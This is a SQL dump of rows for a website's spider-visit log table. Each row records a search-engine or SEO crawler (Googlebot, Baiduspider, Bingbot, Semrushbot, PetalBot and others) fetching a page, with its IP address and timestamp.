INSERT INTO `ey_weapp_spider_visit` VALUES ('96493', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/241.html', '185.191.171.38', '1661332762', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96476', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tbs.html', '114.119.151.155', '1661327765', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96487', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661331017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96478', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/226.html', '116.179.32.80', '1661329163', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96427', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '116.179.32.73', '1661307149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97454', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/497.html', '216.244.66.194', '1661738152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96324', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661252323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96327', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jiayi.html', '114.119.151.155', '1661253690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96437', '99', 'mozilla/5.0 (compatible; seznambot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', '/gongsijianjie/', '77.75.76.164', '1661311212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96455', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/187.html', '220.181.108.113', '1661317797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96456', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.66', '1661318010', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96459', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/121.html', '185.191.171.1', '1661319598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98945', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/', '162.55.86.60', '1662448012', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96443', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/187.html', '185.191.171.10', '1661312963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96442', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661312815', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98949', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/217.html', '66.249.79.110', '1662449650', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96440', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/195.html', '185.191.171.33', '1661311799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96441', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/280.html', '116.179.32.15', '1661312058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96495', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/250.html', '114.119.151.153', '1661333611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98957', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_28/', '185.191.171.6', '1662451626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98952', '99', 'mozilla/5.0 (compatible; seznambot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', '/sitemap.xml', '77.75.78.166', '1662450544', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96439', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_33/', '185.191.171.24', '1661311513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96422', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_26.html', '185.191.171.23', '1661305950', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96453', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '103.43.70.250', '1661315587', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96770', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/314.html', '162.55.86.60', '1661444546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96421', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qy.html', '114.119.151.155', '1661305615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96423', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/339.html', '114.119.151.153', '1661306199', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96420', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/327.html', '114.119.151.153', '1661305527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98953', '6', 'mozilla/5.0 applewebkit/537.36 (khtml, like gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) chrome/103.0.5060.134 safari/537.36', '/news/139.html', '207.46.13.213', '1662450656', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96417', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hz.html', '114.119.151.153', '1661304825', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96772', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/433.html', '162.55.86.60', '1661444560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96416', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/351.html', '114.119.151.153', '1661304659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96773', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/445.html', '162.55.86.60', '1661444568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96406', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/445.html', '114.119.151.153', '1661303623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96407', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/414.html', '114.119.151.155', '1661303853', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96404', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/343.html', '17.121.113.32', '1661303294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96405', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/335.html', '114.119.151.155', '1661303333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96408', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_11.html', '220.181.108.156', '1661303979', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96401', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/313.html', '66.249.79.110', '1661300398', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96399', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.162', '1661298328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96402', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/45.html', '185.191.171.19', '1661302886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96400', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.110', '1661300022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96397', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.35', '1661293213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96398', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661295676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96395', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/12.html', '220.181.108.114', '1661291383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96396', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/195.html', '185.191.171.19', '1661293111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96394', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/225.html', '66.249.79.110', '1661289886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96409', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xuzhoushi.html', '114.119.151.155', '1661304111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96390', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_45/', '114.119.151.153', '1661286335', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96391', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/146.html', '185.191.171.13', '1661286351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96392', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1661287055', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96393', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.129.224.13', '1661287610', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96776', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/486.html', '162.55.86.60', '1661444597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96387', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661285250', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96777', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/487.html', '162.55.86.60', '1661444611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96386', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jincheng.html', '114.119.151.153', '1661284974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96433', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/94.html', '216.244.66.194', '1661308707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96449', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661315119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96383', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '220.181.108.177', '1661283792', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96379', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '220.181.108.168', '1661283790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96780', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/491.html', '162.55.86.60', '1661444644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96388', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/list_20_6/', '114.119.151.155', '1661285298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96389', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661286101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96457', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661318144', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96507', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52_4.html', '185.191.171.25', '1661337779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96431', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.134', '1661308377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96448', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/195.html', '216.244.66.194', '1661315048', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96435', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/280.html', '220.181.108.102', '1661310425', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96436', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_29/', '185.191.171.8', '1661310707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96505', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_25/', '216.244.66.194', '1661337291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96373', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.112', '1661281762', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96374', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/152.html', '185.191.171.44', '1661282142', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96768', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/312.html', '162.55.86.60', '1661444530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96767', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/311.html', '162.55.86.60', '1661444515', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96545', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/166.html', '185.191.171.24', '1661358406', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96547', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '110.88.127.232', '1661359522', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97488', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_15.html', '185.191.171.36', '1661755561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97233', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.124', '1661642604', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96496', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/308.html', '185.191.171.40', '1661335992', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96260', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '116.179.32.49', '1661231102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96248', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nanling.html', '114.119.151.155', '1661225743', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96214', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/306.html', '162.55.86.60', '1661218353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96213', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/278.html', '162.55.86.60', '1661218345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96212', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/', '162.55.86.60', '1661218339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96210', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/495.html', '162.55.86.60', '1661218323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96207', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/419.html', '162.55.86.60', '1661218307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96208', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/466.html', '162.55.86.60', '1661218310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96240', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/225.html', '49.7.21.126', '1661221273', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96220', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/335.html', '162.55.86.60', '1661218399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96241', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/15.html', '116.179.32.25', '1661221286', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96242', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/345.html', '17.121.112.47', '1661222063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96219', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/331.html', '162.55.86.60', '1661218389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96195', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/290.html', '162.55.86.60', '1661218228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96185', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/', '162.55.86.60', '1661218161', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96186', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jbJxw/', '162.55.86.60', '1661218170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96249', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/112.html', '220.181.108.114', '1661226193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96250', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/152.html', '114.119.151.155', '1661226931', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96194', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/289.html', '162.55.86.60', '1661218223', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96173', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/', '162.55.86.60', '1661218090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96175', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/blj/', '162.55.86.60', '1661218098', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96227', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/71.html', '162.55.86.60', '1661218450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96172', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcwd/', '162.55.86.60', '1661218082', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96171', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bc/', '162.55.86.60', '1661218079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96228', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/81.html', '162.55.86.60', '1661218466', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96235', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '220.181.108.167', '1661218832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96578', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/15.html', '114.119.151.153', '1661370426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96170', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/about/', '162.55.86.60', '1661218073', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96193', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/288.html', '162.55.86.60', '1661218214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96247', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661225518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96222', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/337.html', '162.55.86.60', '1661218410', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96223', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/339.html', '162.55.86.60', '1661218415', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96217', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/327.html', '162.55.86.60', '1661218376', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96218', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/328.html', '162.55.86.60', '1661218383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96200', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/377.html', '162.55.86.60', '1661218256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96203', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/391.html', '162.55.86.60', '1661218276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96152', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_2.html', '220.181.108.83', '1661209012', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96262', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_37/', '114.119.151.155', '1661231778', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96263', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/239.html', '114.119.151.155', '1661232483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96259', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/279.html', '114.119.151.153', '1661230886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96261', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zjs.html', '114.119.151.155', '1661231412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96149', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/494.html', '118.184.177.93', '1661207323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96151', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/153.html', '216.244.66.194', '1661208574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96221', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/336.html', '162.55.86.60', '1661218407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96237', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.112', '1661219594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96148', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.113', '1661207093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96147', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/36.html', '116.179.32.152', '1661206556', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96256', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.110', '1661229134', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96255', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/305.html', '185.191.171.40', '1661228819', '0');
